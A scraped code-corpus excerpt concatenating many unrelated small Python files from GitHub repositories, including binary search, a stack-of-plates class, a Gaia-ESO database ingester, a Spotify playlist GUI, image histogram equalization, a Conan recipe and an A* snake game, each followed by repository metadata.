globals()['pos2']=mid
return True
else:
if lst[mid]<n:
l=mid+1
else:
u=mid-1
return False
pos2=-1
lst = [1,2,3,4,5,6,7,8,9]
n = 9
if Bsearch(lst,n):
print("element found in location ",pos2+1)
else:
print("element not found") | PADDA-YOGESHWAR/python2 | 1-2binarysearch.py | 1-2binarysearch.py | py | 598 | python | en | code | 0 | github-code | 90 |
3393060834 | from unittest import TestCase
from icm.modular_test import ProcessModule, Compose, DataInit, Loop
class AppenderModule(ProcessModule):
required_keys = ["array"]
def run(self):
self.array.append(len(self.array))
class EpochsLoop(Loop):
required_keys = [{"hp": ["max_length"]}]
def terminate(self):
return len(self.array) >= self.hp.max_length
class TestModular(TestCase):
def test_data_passage(self):
graph = Compose(
DataInit({"array": []}),
AppenderModule(),
AppenderModule(),
AppenderModule(),
)()
self.assertEqual(graph.array, [0, 1, 2])
def test_loop(self):
graph = Compose(
DataInit({"array": []}),
AppenderModule(),
DataInit({"hp": {"max_length": 10}}),
EpochsLoop(AppenderModule()),
)()
self.assertEqual(graph.array, list(range(10)))
| Akhilez/reward_lab | curiosity/icm/test_modular.py | test_modular.py | py | 937 | python | en | code | 2 | github-code | 90 |
43577001761 | class StackOfPlates:
def __init__(self, stack_size):
self.stacks = []
self.stack_size = stack_size
def push(self, value):
# Added new stack
if (len(self.stacks)-1)< self.index_of_push_able_stack():
self.stacks += [[]]
self.stacks[self.index_of_push_able_stack()] += [value]
def pop(self):
if self.is_empty():
raise Exception("Empty Stack !!")
self.stacks[len(self.stacks)-1].pop()
if len(self.stacks[len(self.stacks)-1]) == 0:
self.stacks.pop(len(self.stacks)-1)
def peek(self):
if self.is_empty():
raise Exception("Empty Stack !!")
stack = self.stacks[len(self.stacks)-1]
print(stack[len(stack)-1])
def is_empty(self):
return not bool(self.stacks)
def print_stacks(self):
print(self.stacks)
def index_of_push_able_stack(self):
index_number = 0
for stack in self.stacks:
if len(stack) != self.stack_size:
return index_number
index_number += 1
return index_number
stack = StackOfPlates(2)
stack.push(10)
stack.push(20)
stack.push(30)
stack.push(40)
stack.push(50)
stack.push(60)
stack.push(70)
stack.push(80)
stack.push(0)
stack.push(90)
stack.push(100)
stack.push(50)
stack.push(60)
stack.push(80)
stack.print_stacks()
stack.pop()
stack.pop()
stack.pop()
stack.print_stacks()
stack.peek() | mostafijur-rahman299/cracking-coding-interview-solutions | Stack & Queue/stack-of-plates.py | stack-of-plates.py | py | 1,590 | python | en | code | 0 | github-code | 90 |
13633640595 |
""" A specialized database class for Gaia-ESO Survey data releases. """
import logging
import numpy as np
from astropy.io import fits
from astropy.table import Table
import utils
from db import Database
logger = logging.getLogger("ges")
class GESDatabase(Database):
def __init__(self, *args, **kwargs):
super(GESDatabase, self).__init__(*args, **kwargs)
def create_or_retrieve_node_id(self, wg, node_name):
"""
Reteive a unique identifier for a node, or create one.
:param wg:
The working group (e.g., 10).
:param node_name:
The name of the node.
"""
try:
return self.retrieve_node_id(wg, node_name)
except UnknownNodeError:
return self._create_node(wg, node_name)
def retrieve_node_id(self, wg, node_name):
"""
Retrieve a unique identifier for a node.
:param wg:
The working group (w.g., 10).
:param node_name:
The name of the node.
:raises UnknownNodeError:
If no node exists.
:returns:
The identifier.
"""
result = self.retrieve("""SELECT id FROM nodes
WHERE wg = %s AND lower(name) = %s""",
(utils.wg_as_int(wg), node_name.strip().lower(), ))
if not result:
raise UnknownNodeError("node does not exist")
else:
return int(result[0][0])
def _create_node(self, wg, node_name):
"""
Create a node.
:param wg:
The working group (e.g., 10).
:param node_name:
The name of the node.
"""
wg = utils.wg_as_int(wg)
node_name = node_name.strip()
result = self.execute(
"""INSERT INTO nodes (wg, name) VALUES (%s, %s) RETURNING id""",
(wg, node_name), fetch=True)
node_id = int(result[1][0][0])
logger.info("Created node '{}' in WG{} with id {}".format(
node_name, wg, node_id))
return node_id
def ingest_recommended_results_from_previous_dr(self, filename, extension=-1):
"""
Ingest recommended results from a node FITS file.
:param filename:
A node template file in FITS format.
:param extension: [optional]
The extension index to read from.
:returns:
The number of rows inserted.
"""
image = fits.open(filename)
data = image[extension].data
columns = ("cname", "ges_fld", "object", "filename", "ges_type",
"teff", "e_teff", "logg", "e_logg", "mh", "e_mh", "xi", "e_xi",
"peculi", "remark", "tech")
fits_format_adapters = {
"teff": float,
"e_teff": float,
"logg": float,
"e_logg": float,
"mh": float,
"e_mh": float,
"xi": float,
"e_xi": float,
}
N = len(data)
for i, row in enumerate(data):
logger.info("Ingesting recommended row {}/{}".format(i, N))
row_data = {}
for column in columns:
value = row[column]
f = fits_format_adapters.get(column, None)
if f is not None:
value = f(value)
row_data[column] = value
self.execute(
"INSERT INTO recommended_idr4 ({}) VALUES ({})".format(
", ".join(columns),
", ".join(["%({})s".format(column) for column in columns])),
row_data)
self.connection.commit()
return N
def ingest_node_results(self, filename, extension=-1):
"""
Ingest results from a node FITS file.
:param filename:
A node template file in FITS format.
:param extension: [optional]
The extension index to read from.
:returns:
The number of rows inserted.
"""
# Which node is this?
wg, node_name = utils.parse_node_filename(filename)
node_id = self.retrieve_node_id(wg, node_name)
# Start ingesting results.
data = Table.read(filename, hdu=extension)
default_row = {"node_id": node_id}
columns = (
"node_id", "cname", "filename", "setup", "snr",
"vel", "e_vel", "vrot", "e_vrot",
"teff", "e_teff", "nn_teff", "enn_teff", "nne_teff", "sys_err_teff",
"logg", "e_logg", "nn_logg", "enn_logg", "nne_logg", "sys_err_logg", "lim_logg",
"feh", "e_feh", "nn_feh", "enn_feh", "nne_feh", "sys_err_feh",
"xi", "e_xi", "nn_xi", "enn_xi", "nne_xi",
"mh", "e_mh", "nn_mh", "enn_mh", "nne_mh",
"alpha_fe", "e_alpha_fe", "nn_alpha_fe", "enn_alpha_fe", "nne_alpha_fe",
"vrad", "e_vrad", "vsini", "e_vsini",
"peculi", "remark", "tech")
fits_format_adapters = {
"snr": float,
"vel": float,
"e_vel": float,
"vrot": float,
"e_vrot": float,
"teff": float,
"e_teff": float,
"nn_teff": int,
"enn_teff": float,
"nne_teff": float,
"sys_err_teff": float,
"logg": float,
"e_logg": float,
"nn_logg": int,
"enn_logg": float,
"nne_logg": float,
"sys_err_logg": float,
"lim_logg": int,
"feh": float,
"e_feh": float,
"nn_feh": int,
"enn_feh": float,
"nne_feh": float,
"sys_err_feh": float,
"xi": float,
"e_xi": float,
"nn_xi": int,
"enn_xi": float,
"nne_xi": float,
"mh": float,
"e_mh": float,
"nn_mh": int,
"enn_mh": float,
"nne_mh": float,
"alpha_fe": float,
"e_alpha_fe": float,
"nn_alpha_fe": int,
"enn_alpha_fe": float,
"nne_alpha_fe": float,
"vrad": float,
"e_vrad": float,
"vsini": float,
"e_vsini": float,
}
# Update formats, as necessary.
tmp_key_format = "{}_NEW_DTYPE"
for key, new_dtype in fits_format_adapters.items():
data[tmp_key_format.format(key.upper())] = np.array(data[key.upper()], dtype=new_dtype)
del data[key.upper()]
data.rename_column(tmp_key_format.format(key.upper()), key.upper())
N = len(data)
for i, row in enumerate(data):
logger.info("Ingesting row {}/{} from node WG{}: {}".format(i, N,
wg, node_name))
row_data = {}
row_data.update(default_row)
row_data.update(dict(zip(columns[1:], [row[c.upper()] for c in columns[1:]])))
self.execute(
"INSERT INTO results ({}) VALUES ({})".format(
", ".join(columns),
", ".join(["%({})s".format(column) for column in columns])),
row_data)
self.connection.commit()
return N
def ingest_spectra_masterlist(self, filename, extension=-1):
"""
Ingest a master list of spectra from a FITS template file.
:param filename:
A FITS template file that contains the masterlist of all spectra.
:returns:
The number of rows inserted.
"""
image = fits.open(filename)
data = image[extension].data
# Create mapper between FITS and database columns.
columns = ("cname", "ges_fld", "object", "filename", "ges_type", "setup",
"wg", "instrument", "ra", "dec", "snr", "vel", "e_vel", "vrot",
"e_vrot", "teff_irfm", "e_teff_irfm", "peculi", "remark", "tech")
fits_column_adapters = {
"instrument": "instrume"
}
fits_format_adapters = {
"wg": utils.safe_int,
"ra": float,
"dec": float,
"snr": float,
"vel": float,
"e_vel": float,
"vrot": float,
"e_vrot": float,
"teff_irfm": float,
"e_teff_irfm": float,
}
N = len(data)
for i, row in enumerate(data):
logger.info("Inserting row {}/{}".format(i, N))
values = []
for col in columns:
use_col = fits_column_adapters.get(col, col)
value = row[use_col]
# Formatting.
if col in fits_format_adapters:
f = fits_format_adapters[col]
value = f(value)
values.append(value)
self.execute(
"INSERT INTO spectra ({}) VALUES ({})".format(
", ".join(columns), ", ".join(["%s"] * len(columns))),
values)
self.connection.commit()
return N
def ingest_magrini_photometric_temperatures(self, filename, extension=-1):
"""
Ingest a FITS table containing CNAMEs and photometric temperatures.
:param filename:
A FITS table.
:param extension: [optional]
The HDU extension that contains the photometric temperatures.
"""
image = fits.open(filename)
data = image[extension].data
# The columns might be different, but in general if we lowerize them all
# then we are looking for:
# ('CNAME_2', 'GES_FLD', 'teffjk', 'jk', 'FILENAME')
cname_col, teff_col = (data.dtype.names[0], "teffjk")
# Update the value in the spectra table, unless it already exists.
N = 0
for row in data:
result = self.execute(
""" UPDATE spectra
SET teff_irfm = %s
WHERE cname = %s AND
teff_irfm = 'NaN'""",
(float(row[teff_col]), row[cname_col], ))
return True
class UnknownNodeError(BaseException):
pass
| andycasey/ges-idr5 | code/gesdb.py | gesdb.py | py | 10,196 | python | en | code | 0 | github-code | 90 |
73909413415 | # Import
import json
import PySimpleGUI as sg
import spotipy
from spotipy.oauth2 import SpotifyOAuth
# Main windows
def windows_main():
# Windows to update all
def windows_update_all():
"""
TODO Add a "try" for create a "APP_CLIENT_ID.txt" and "APP_CLIENT_SECRET.txt" if is not valid
export SPOTIPY_CLIENT_ID='your-spotify-client-id'
export SPOTIPY_CLIENT_SECRET='your-spotify-client-secret'
"""
def spotify_authentication():
# Import APP_CLIENT_ID and SECRET
f_APP_CLIENT_ID = open('APP_CLIENT_ID.txt', 'r')
APP_CLIENT_ID = f_APP_CLIENT_ID.read()
f_APP_CLIENT_SECRET = open('APP_CLIENT_SECRET.txt', 'r')
APP_CLIENT_SECRET = f_APP_CLIENT_SECRET.read()
APP_CLIENT_LINK = 'http://localhost/'
APP_CLIENT_SCOPE = 'playlist-read-private user-library-read'
# OAUTH
sp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id=APP_CLIENT_ID,
client_secret=APP_CLIENT_SECRET,
redirect_uri=APP_CLIENT_LINK,
scope=APP_CLIENT_SCOPE))
return sp
# All liked track
def results_all_liked_track(sp):
# Parameters
limit_liked_track = 50
offset_liked_track = 0
last_liked_track = False
old_results_liked_track = sp.current_user_saved_tracks()
last_id_liked_track = (old_results_liked_track['total'] - 1)
file_results_all_liked_track = open("results_all_liked_track.txt", "w")
file_results_all_liked_track.write('')
file_results_all_liked_track.close()
# List of all liked track
results_all_liked_track = []
while not last_liked_track:
file_results_all_liked_track = open("results_all_liked_track.txt", "a")
for item in sp.current_user_saved_tracks(limit_liked_track, offset_liked_track)['items']:
results_all_liked_track.append(item)
file_results_all_liked_track.write(json.dumps(item) + '\n')
print(item['added_at'] + ' - ' + item['track']['name'] + ' - ALBUM : ' + item['track']['album'][
'name'] + ' - ARTIST : ' + item['track']['artists'][0]['name'] + ' - ID : ' + item['track'][
'id'])
offset_liked_track = offset_liked_track + limit_liked_track
last_liked_track = (offset_liked_track >= last_id_liked_track)
file_results_all_liked_track.close()
return results_all_liked_track
# * All playlist user
def results_all_playlist_user(sp):
# * Parametres
last_playlist_user = 'FALSE'
limit_playlist_user = 50
offset_playlist_user = 0
old_results_playlist_user = sp.current_user_playlists()
last_id_playlist_user = (old_results_playlist_user['total'] - 1)
# * List of all liked track
results_all_playlist_user = []
while not last_playlist_user == 'TRUE':
for item in sp.current_user_playlists(limit_playlist_user, offset_playlist_user)['items']:
results_all_playlist_user.append(item)
print(item['name'] + ' - ID : ' + item['id'])
offset_playlist_user = offset_playlist_user + limit_playlist_user
if offset_playlist_user >= last_id_playlist_user:
last_playlist_user = 'TRUE'
return results_all_playlist_user
layout = [[sg.Button('Update Spotify info in .txt files'), sg.Exit('Use the .txt files')]]
window = sg.Window('ListoFy update').Layout(layout)
while True:
event, values = window.Read()
if event in (None, 'Use the .txt files'):
try:
file_results_all_liked_track = open("results_all_liked_track.txt", "r")
results_all_liked_track = file_results_all_liked_track.readlines()
except:
print('error')
break
if event == 'Update Spotify info in .txt files':
sp = spotify_authentication()
results_all_liked_track = results_all_liked_track(sp)
results_all_playlist_user = results_all_playlist_user(sp)
break
window.Close()
return results_all_playlist_user, results_all_liked_track
results = windows_update_all()
file_list_column = [
[
sg.Button(button_text="Liked"),
sg.Button(button_text="Playlist", enable_events=True),
],
[
sg.Listbox(
values=[], enable_events=True, size=(40, 20), key="-FILE LIST-"
)
],
]
# For now will only show the name of the file that was chosen
image_viewer_column = [
[sg.Text(size=(40, 1), key="-TOUT-")],
[sg.Image(key="-IMAGE-")],
]
# -- -- - Full layout -- -- -
layout = [
[
sg.Column(file_list_column),
sg.VSeperator(),
sg.Column(image_viewer_column),
]
]
window = sg.Window("Image Viewer", layout)
# Run the Event Loop
while True:
event, values = window.read()
if event == "Exit" or event == sg.WIN_CLOSED:
break
# Folder name was filled in, make a list of files in the folder
if event == "-FOLDER-":
folder = values["-FOLDER-"]
try:
# Get list of files in folder
file_list = os.listdir(folder)
except:
file_list = []
fnames = [
f
for f in file_list
if os.path.isfile(os.path.join(folder, f))
and f.lower().endswith((".png", ".gif"))
]
window["-FILE LIST-"].update(fnames)
elif event == "-FILE LIST-": # A file was chosen from the listbox
try:
filename = os.path.join(
values["-FOLDER-"], values["-FILE LIST-"][0]
)
window["-TOUT-"].update(filename)
window["-IMAGE-"].update(filename=filename)
except:
pass
window.close()
# Create an event loop
while True:
event, values = window.read()
# End program if user closes window or
# presses the OK button
if event == "OK" or event == sg.WIN_CLOSED:
break
window.close()
# * Reload all infos
windows_main()
"""
last_id_playlist_user = 0
while not last_id_playlist_user == len(results_all_playlist_user):
print(str(last_id_playlist_user) + ' - ' + results_all_playlist_user[last_id_playlist_user]['name'] + ' - ID : ' + results_all_playlist_user[last_id_playlist_user]['id'])
last_id_playlist_user = last_id_playlist_user+1
in_playlist_use_all = input('What playlist numbers do you use for "ALL" ? "none" for no playlist : ')
"""
print('END') | YDeltagon/ListoFy | main.py | main.py | py | 7,271 | python | en | code | 0 | github-code | 90 |
18296548619 | import sys
def I(): return int(sys.stdin.readline().rstrip())
X = I()
for i in range(X,1000000):
for j in range(2,int(i**.5)+1):
if i % j == 0:
break
else:
print(i)
break
| Aasthaengg/IBMdataset | Python_codes/p02819/s869612331.py | s869612331.py | py | 218 | python | en | code | 0 | github-code | 90 |
69897770856 | import pandas as pd
#import numpy as np
import matplotlib.pyplot as plt
dataset= pd.read_json('iris.json')
dataset= dataset.drop(columns= 'species')
X= dataset.iloc[:, :].values
from sklearn.decomposition import PCA
pca= PCA(n_components= 2)
X= pca.fit_transform(X)
#explained_variance= pca.explained_variance_ratio_
from sklearn.cluster import KMeans
wcss= list()
for i in range(1, 11):
kmeans= KMeans(n_clusters= i, init= 'k-means++', n_init= 10, max_iter= 300)
kmeans.fit(X)
wcss.append(kmeans.inertia_)
plt.plot(range(1, 11), wcss)
plt.title("Elbow Method")
plt.xlabel("Number of Clusters")
plt.ylabel("WCSS")
plt.show()
kmeans= KMeans(n_clusters= 3, init= 'k-means++', n_init= 10, max_iter= 300)
y_kmeans= kmeans.fit_predict(X)
plt.scatter(X[y_kmeans== 1, 0], X[y_kmeans== 1, 1], c= 'red', s= 100, label= 'setosa')
plt.scatter(X[y_kmeans== 0, 0], X[y_kmeans== 0, 1], c= 'blue', s= 100, label= 'versicolor')
plt.scatter(X[y_kmeans== 2, 0], X[y_kmeans== 2, 1], c= 'yellow', s= 100, label= 'virginica')
plt.title("Iris")
plt.xlabel("PC1")
plt.ylabel("PC2")
plt.legend()
plt.show() | jeshugames2/Iris | iris.py | iris.py | py | 1,140 | python | en | code | 0 | github-code | 90 |
73783290536 | import yaml
import geopy.distance
from pyproj import Proj
def load_yaml(filename):
"""
Load yaml into python dict
Parameters
----------
filename: str
absolute path of .yaml file
Returns
-------
YAML: dict
Required file
"""
with open(filename, "r") as stream:
try:
YAML = yaml.safe_load(stream)
return YAML
except yaml.YAMLError as exc:
print(exc)
return
def convert_distance(
distance_unit,
):
"""
Convert meters into unit of choice.
Parameters
----------
distance_unit: str
desired unit
Returns
-------
unit_factor: float
rescaling factor e.g. x[meters] / unit_factor = y[distance_unit]
"""
if distance_unit in ["mi","mile","miles"]:
unit_factor = 1609.34
elif distance_unit in ["km","kilometer","kilometers"]:
unit_factor = 1000.0
elif distance_unit in ["m", "meter", "meters"]:
unit_factor = 1.0
return unit_factor
def get_units(
distance_unit
):
"""
Get plotting labels for the units of distance.
Parameters
----------
distance_unit: str
unit of distances
Returns
-------
distance_unit: str
plotting distance label
"""
if distance_unit in ["mi","mile","miles"]:
distance_unit = "mi"
elif distance_unit in ["km","kilometer","kilometers"]:
distance_unit = "km"
elif distance_unit in ["m", "meter", "meters"]:
distance_unit = "m"
return distance_unit
def format_date_string(
date
):
"""
Get plotting representation for the date
Parameters
----------
date: str
A date
Returns
-------
date: str
plotting date
"""
day_num = date.strftime('%d')
month_num = date.strftime('%m')
month_str = date.strftime('%B')
year = date.strftime('%Y')
if day_num[0] == 0:
day_num = day_num[1:]
if day_num[-1] == "1":
super_str = "st"
elif day_num[-1] == "2":
super_str = "nd"
elif day_num[-1] == "3":
super_str = "rd"
else:
super_str = "th"
return f"{day_num}{super_str} {month_str} {year}"
def calculate_distance(coords_1, coords_2):
"""
Calculate the geodesic distance between two coordinates
Parameters
----------
coords_1: coordinates class
First coordinate class
coords_2: coordinates class
Second coordinate class
Returns
-------
D: float
distance between coordinates in miles
"""
D = geopy.distance.distance([coords_1.long,coords_1.lat],[coords_2.long,coords_2.lat]).miles
return D
def latlong_to_proj(crs, long,lat):
"""
Convert lat long coordinates into coordinates in new projection
Parameters
----------
crs: str
coordinate reference system
lat: float
latitude value
long: float
longitude value
Returns
-------
proj: Proj class instance
Proj class instance
"""
return Proj(crs)(long,lat)
class Coords:
def __init__(
self,
lat = 0,
long = 0
):
"""
Class defining a set of coordinates
Parameters
----------
lat: float
latitude value
long: float
longitude value
"""
self.lat = lat
self.long = long
x1,y1 = latlong_to_proj("EPSG:3857", long, lat) #Into Mercator
self.x = x1
self.y = y1 | sephwalker321/Bellpedia | bellpedia/functions.py | functions.py | py | 3,796 | python | en | code | 0 | github-code | 90 |
17983505249 | n,m=map(int,input().split())
mod=10**9+7
nkai=1
mkai=1
for i in range(1,n+1):
nkai*=(i%mod)
nkai=(nkai%mod)
for i in range(1,m+1):
mkai*=(i%mod)
mkai=(mkai%mod)
if abs(n-m)>=2:
print(0)
elif abs(n-m)==1:
print((mkai*nkai)%mod)
elif abs(n-m)==0:
print((mkai*nkai*2)%mod) | Aasthaengg/IBMdataset | Python_codes/p03681/s085979982.py | s085979982.py | py | 283 | python | ja | code | 0 | github-code | 90 |
1691097915 | from cmd import Cmd
class MyPrompt(Cmd):
def do_hello(self, args):
"""Says hello. If you provide a name, it will greet you with it."""
if len(args) == 0:
name = 'stranger'
else:
name = args
print("Hello, " + name)
def do_quit(self, args):
"""Quits the program."""
print("Quitting.")
raise SystemExit
if __name__ == '__main__':
prompt = MyPrompt()
prompt.prompt = '> '
prompt.cmdloop('Starting prompt...') | liyu10000/playboy | cases/qq/cmd_test.py | cmd_test.py | py | 509 | python | en | code | 2 | github-code | 90 |
22139237672 | import cv2
import numpy as np
import matplotlib.pyplot as plt
img = cv2.imread('C:/Users/TOBI/Documents/Belajar_Python/PCD_prak/p3/car.png')
def img_to_hist(name, image):
plt.figure(name)
plt.title(name)
plt.hist(image.ravel(), 256, [0,256])
# plt.savefig('{}.png'.format(name.lower()))
return plt.show()
def list_to_hist(name, list):
bin = [i for i in range(0, 256)]
plt.figure(name)
plt.title(name)
plt.bar(bin, list)
# plt.savefig('{}.png'.format(name.lower()))
return plt.show()
def contrastStretching(image):
row, col = image.shape
canvas = np.zeros((row, col, 1), np.uint8)
fmin = min(image.ravel())
fmax = max(image.ravel())
for i in range(0, row):
for j in range(0, col):
canvas[i, j] = ((image[i,j] - fmin)/(fmax-fmin)) * 255
return canvas
def jmlKemunculan(image):
row, col = image.shape
kemunculan = [0]*256
for i in range(0, row):
for j in range(0, col):
kemunculan[image[i, j]] += 1
return kemunculan
def normalize(kemunculan, image):
row, col = image.shape
probability = [0]*256
for i in range(0, 256):
probability[i] = kemunculan[i] / (row * col)
return probability
def kumulatifSum(normalisasi):
kumulatif = [0]*256
sum = 0
for i in range(256):
sum += normalisasi[i]
kumulatif[i] = sum
return kumulatif
def equalized(kumulatif, image):
row, col = image.shape
for i in range(0, 256):
kumulatif[i] = kumulatif[i] * 255
for i in range(row):
for j in range(col):
image[i, j] = kumulatif[image[i, j]]
return image
def histogramEqualization(image):
kemunculan = jmlKemunculan(image)
normalisasi = normalize(kemunculan, image)
kumulatif = kumulatifSum(normalisasi)
ekualisasi = equalized(kumulatif, image)
return normalisasi, kumulatif, ekualisasi
def bgr2gray(img):
b, g, r = img[:,:,0], img[:,:,1], img[:,:,2]
gray = 0.114 * b + 0.587 * g + 0.299 * r
return gray
gray_img = bgr2gray(img)
normalisasi, kumulatif, ekualisasi = histogramEqualization(gray_img)
cv2.imshow("Hasil histogram equalization", ekualisasi)
cv2.waitKey(0) | tobialbertino/belajar-code | Belajar_Python/PCD_prak/p3/lkp3test.py | lkp3test.py | py | 2,212 | python | en | code | 2 | github-code | 90 |
29597822265 | #!/usr/bin/python3
"""
A module for working with lockboxes.
"""
def canUnlockAll(boxes):
"""Method that determines if all the boxes can be opened"""
n = len(boxes)
visited = [False] * n
visited[0] = True
pile = [0]
while pile:
actualBox = pile.pop()
for key in boxes[actualBox]:
if 0 <= key < n and not visited[key]:
visited[key] = True
pile.append(key)
return all(visited)
| 8srael/alx-interview | 0x01-lockboxes/0-lockboxes.py | 0-lockboxes.py | py | 469 | python | en | code | 0 | github-code | 90 |
19985427455 | #!/usr/bin/env python3
from conans import ConanFile, CMake
class AlloyConan(ConanFile):
# Package Info
name = "Alloy"
version = "0.1.0"
description = "A game engine"
url = "https://github.com/bitwizeshift/Alloy"
author = "Matthew Rodusek <matthew.rodusek@gmail.com>"
license = "MIT"
# Sources
exports = ("LICENSE",
"doc/licenses")
exports_sources = ( "lib/*",
"bin/*",
"extra/*",
"cmake/*",
"doc/*",
"CMakeLists.txt",
"LICENSE" )
# Settings
settings = "os", "compiler", "build_type", "arch"
options = {
"install_docs" : [True,False],
"shared" : [True,False],
"extras" : [True,False],
"examples" : [True,False],
"exceptions" : [True,False],
"precision" : ["float", "double"]
}
default_options = {
"install_docs" : False,
"shared" : False,
"extras" : False,
"examples" : False,
"exceptions" : True,
"precision" : "float"
}
generators = "cmake"
# Dependencies
build_requires = ("Catch2/2.7.1@catchorg/stable")
# requires = ("SDL/2.0.9@/stable")
def requirements(self):
if self.options.extras:
self.requires("fmt/5.3.0@bincrafters/stable", "private")
def imports(self):
# Puts the licenses of all dependencies into the install directory
self.copy(pattern="licenses", dst="licenses", folder=True, ignore_case=True)
def configure_cmake(self):
cmake = CMake(self)
# Features
cmake.definitions["ALLOY_COMPILE_SELF_CONTAINMENT_TESTS"] = "ON"
cmake.definitions["ALLOY_COMPILE_TESTS"] = "OFF"
cmake.definitions["ALLOY_COMPILE_EXTRAS"] = "ON" if self.options.extras else "OFF"
cmake.definitions["ALLOY_COMPILE_EXAMPLES"] = "ON" if self.options.examples else "OFF"
cmake.definitions["ALLOY_GENERATE_DOCS"] = "ON" if self.options.install_docs else "OFF"
cmake.definitions["ALLOY_INSTALL_DOCS"] = "ON" if self.options.install_docs else "OFF"
# ABI
cmake.definitions["BUILD_SHARED_LIBS"] = "ON" if self.options.shared else "OFF"
cmake.definitions["ALLOY_ENABLE_EXCEPTIONS"] = "ON" if self.options.exceptions else "OFF"
cmake.definitions["ALLOY_PRECISION"] = self.options.precision
cmake.configure()
return cmake
def build(self):
cmake = self.configure_cmake()
cmake.build()
# cmake.test()
# if we are installing documentation, it needs to be generated
if self.options.install_docs:
cmake.build(target="AlloyDocs")
def package(self):
cmake = self.configure_cmake()
cmake.install()
# Copy this library's license, and
# all dependencies' licenses
self.copy(pattern="LICENSE", dst="licenses")
self.copy(pattern="doc/licenses/*", dst="licenses")
def package_id(self):
pass | bitwizeshift/Alloy | conanfile.py | conanfile.py | py | 3,063 | python | en | code | 7 | github-code | 90 |
18296354939 | X = int(input())
# 順に素数判定を行えばよい
def is_prime(x):
if x <= 1:
return False
for i in range(2, x):
if x % i == 0:
return False
return True
p = X
while not is_prime(p):
p += 1
print(p) | Aasthaengg/IBMdataset | Python_codes/p02819/s648379174.py | s648379174.py | py | 233 | python | en | code | 0 | github-code | 90 |
34696601674 | def even_list(s):
s = s.split(' ')
for word in s:
if len(word) % 2 == 0:
print(word)
s = "bob jimmy baxb bernie bordan futurehendrix"
even_list(s)
test_str = "cob cimmy maxb bernie jordan cuturehendrix"
res = []
for ele in test_str.split():
if len(ele) % 2:
res.append(ele)
print("The odd length names are : " + str(res)) | solarphaces/PreWork | assignment_5.py | assignment_5.py | py | 389 | python | en | code | 0 | github-code | 90 |
41089112217 |
import pygame
from random import randint
import time
Xa=60
Ya=120
grid = []
class NoD(object):
def __init__(self, x, y,Wal):
self.x=x
self.y=y
self.gCost=0
self.hCost=0
self.Padre=None
self.Ve=[]
self.Wal=Wal
def fCost(self):
a=int(self.gCost+self.hCost)
return a
def Rve():
return self.Ve
def regreso(Ini, Fin):
reg=[]
current=Fin
while current != Ini:
reg.append(current)
current=current.Padre
reg.reverse()
return reg
def Ia(Ini, Fin):
Nini=Ini
Nfin=Fin
Lopen=[]
Lclose=[]
Lopen.append(Nini)
while len(Lopen):
current = Lopen[0]
for nodo in Lopen:
nodoF=nodo.fCost()
currentF=current.fCost()
if nodoF < currentF or nodoF == currentF and nodo.hCost < current.hCost:
current = nodo
Lopen.remove(current)
Lclose.append(current)
if current == Nfin:
a = []
a = regreso(Nini,Nfin)
return a
for nodo in current.Ve:
if nodo in Lclose or nodo.Wal==3:
continue
nuevoCosto=current.gCost+dist(current,nodo)
if nodo not in Lopen or nuevoCosto < nodo.gCost:
nodo.gCost = nuevoCosto
nodo.hCost = dist(nodo,Nfin)
nodo.Padre = current
if nodo not in Lopen:
Lopen.append(nodo)
def dist(Ini, Fin):
disX = abs(Ini.x-Fin.x)
disY = abs(Ini.y-Fin.y)
return disX+disY
class Comida:
def __init__(self, x, y):
self.x=int(x)
self.y=int(y)
class Nodo:
def __init__(self, x, y, lead):
self.x=int(x)
self.y=int(y)
self.leader=lead
self.padre=None
def addp(self, nod):
self.padre=nod
def up(self):
if(self.leader!="SI"):
self.x=self.padre.x;
self.y=self.padre.y;
class Snake:
def __init__(self,color):
x=randint(0,Xa-5)
y=randint(0,Ya-5)
cab=Nodo(x,y,"SI")
pri=Nodo(x,y+1,"NO")
pri.addp(cab)
sec=Nodo(x,y+2,"NO")
sec.addp(pri)
self.lis=[]
self.lis.append(cab)
self.dir="AR"
self.color=color
self.lis.append(pri)
self.lis.append(sec)
def lsn(self):
return self.lis
def add(self, nod):
self.lis.append(nod)
def dir(self, nu):
self.dir=nu
def comer(self):
mnodo=Nodo(self.lis[-1].x, self.lis[-1].y,"NO")
mnodo.addp(self.lis[-1])
self.lis.append(mnodo)
def imp(self,grid):
for Nod in self.lis:
grid[Nod.x][Nod.y]=1
def lim(self,grid):
for Nod in self.lis:
grid[Nod.x][Nod.y]=0
def mov(self):
for nod in reversed(self.lis):
nod.up()
if self.dir=="AR":
if self.lis[0].x!=0:
self.lis[0].x-=1
else:
self.lis[0].x=Xa-1
if self.dir=="RG":
if self.lis[0].y!=Ya-1:
self.lis[0].y+=1
else:
self.lis[0].y=0
if self.dir=="DW":
if self.lis[0].x!=Xa-1:
self.lis[0].x+=1
else:
self.lis[0].x=0
if self.dir=="LF":
if self.lis[0].y!=0:
self.lis[0].y-=1
else:
self.lis[0].y=Ya-1
def Ia2(Sn,Path,dele):
if Sn.lis[0].x==0 and Path[0].x==Xa-1 and Sn.lis[0].y == Path[0].y:
Sn.dir="AR"
elif Sn.lis[0].x==Xa-1 and Path[0].x==0 and Sn.lis[0].y == Path[0].y:
Sn.dir="DW"
elif Sn.lis[0].x == Path[0].x and Sn.lis[0].y == 0 and Path[0].y == Ya-1:
Sn.dir="LF"
elif Sn.lis[0].x == Path[0].x and Sn.lis[0].y == Ya-1 and Path[0].y == 0:
Sn.dir="RG"
elif Sn.lis[0].x > Path[0].x and Sn.lis[0].y == Path[0].y:
Sn.dir="AR"
elif Sn.lis[0].x < Path[0].x and Sn.lis[0].y == Path[0].y:
Sn.dir="DW"
elif Sn.lis[0].x == Path[0].x and Sn.lis[0].y > Path[0].y:
Sn.dir="LF"
elif Sn.lis[0].x == Path[0].x and Sn.lis[0].y < Path[0].y:
Sn.dir="RG"
if dele:
Path.pop(0)
pass
NEGRO = (0, 0, 0)
BLANCO = (255, 255, 255)
VERDE = ( 0, 255, 0)
AZUL = (255, 0, 0)
ROJO = (0, 0, 255)
LARGO = 10
ALTO = 10
MARGEN = 0
Ngrid = []
N=0
for fila in range(Xa):
grid.append([])
Ngrid.append([])
for columna in range(Ya):
m=randint(0,9)
if m > 3:
grid[fila].append(0)
else:
grid[fila].append(3)
Ngrid[fila].append(NoD(fila,columna,grid[fila][columna]))
for fila in range(Xa):
for columna in range(Ya):
if fila==0 and columna!=0 and columna!=Ya-1:
Ngrid[fila][columna].Ve.append(Ngrid[Xa-1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
